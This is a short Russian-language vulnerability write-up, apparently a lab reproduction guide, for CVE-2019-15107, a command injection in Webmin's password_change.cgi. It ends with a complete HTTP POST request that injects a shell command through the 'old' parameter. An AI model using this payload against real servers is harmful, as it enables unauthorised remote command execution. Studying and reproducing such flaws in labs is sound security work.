CVE-2019-15107: Эксплойт-модули для уязвимости удаленного выполнения кода в Webmin
- Описание уязвимости
Webmin — это мощный инструмент управления системой на основе Web, широко используемый в системах Unix. В процессе обработки запроса Password_Change.cgi в Webmin параметр old содержит уязвимость внедрения команд (command injection), которая может быть злонамеренно использована атакующим. Если пользователь включил функцию сброса пароля в Webmin, атакующий может воспользоваться этой уязвимостью для выполнения произвольных команд в уязвимой системе и получения доступа к оболочке системы (Shell).
Затронутые версии:
Webmin 1.920 и ниже
- Эксплуатация уязвимости
Способ 1: Ручная проверка
Перейдите на страницу, проигнорировав сертификат, и вы увидите страницу входа в Webmin

Отправьте следующий пакет данных, чтобы выполнить команду id:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
